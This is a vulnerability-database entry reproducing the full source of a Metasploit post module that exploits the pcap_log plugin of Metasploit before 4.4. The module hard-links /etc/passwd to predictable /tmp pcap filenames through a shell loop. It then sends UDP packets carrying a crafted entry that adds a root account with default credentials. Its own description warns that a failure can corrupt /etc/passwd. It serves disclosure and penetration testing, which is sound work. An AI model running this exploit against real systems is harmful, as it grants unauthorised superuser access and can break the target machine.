Multi Escalate Metasploit pcap_log Local Privilege Escalation

Published: 05 Aug 2012 16:20:44. Reported by: 0a29406d9794e4f9b30b3c5d6702c708. Type: metasploit. Source: www.rapid7.com

Metasploit pcap_log Local Privilege Escalation through file hard-linking

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  Rank = ManualRanking

  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
          'Description' => %q{
            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
            This, and all the other packets, are appended to /etc/passwd.

            Successful exploitation results in the creation of a new superuser account.

            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
            a permanent DoS on the target by corrupting the /etc/passwd file.
          },
          'License' => MSF_LICENSE,
          'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708' ],
          'Platform' => %w[bsd linux unix],
          'SessionTypes' => [ 'shell', 'meterpreter' ],
          'References' => [
            [ 'BID', '54472' ],
            [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
            [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
          ],
          'DisclosureDate' => '2012-07-16',
          'Stance' => Msf::Exploit::Stance::Passive
        }
      )
    )
    register_options(
      [
        Opt::RPORT(2940),
        OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
        OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
        OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
      ], self
    )
  end

  def normalize_minutes
    datastore['MINUTES'].abs
  rescue StandardError
    0
  end

  def run
    print_status "Setting up the victim's /tmp dir"
    fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')
    initial_size = read_file('/etc/passwd').lines.count
    print_status "/etc/passwd is currently #{initial_size} lines long"
    i = 0
    j = 0
    loop do
      if (i == 0)
        j += 1
        break if j >= datastore['MINUTES'] + 1 # Give up after X minutes

        # 0a2940: cmd_exec is slow, so send 1 command to do all the links
        print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
        cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
      end
      current_size = read_file('/etc/passwd').lines.count
      if current_size == initial_size
        # PCAP is flowing
        pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
        vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
        udpsock = Rex::Socket::Udp.create(
          {
            'Context' => { 'Msf' => framework, 'MsfExploit' => self }
          }
        )
        res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
      else
        break
      end
      sleep(1) # wait a second
      i = (i + 1) % 60 # increment second counter
    end

    # Ruby's String method is include?, not includes? (the latter raises NoMethodError)
    if read_file('/etc/passwd').include?('Metasploit')
      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
      # TODO: Consider recording our now-created username and password as a valid credential here.
    else
      print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
    end
    # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload.
    #         However, because the session is not a terminal, su will not always allow this.
  end
end

Last updated: 08 Feb 2023 13:47. Vulners AI Score: 6.8 (Medium risk).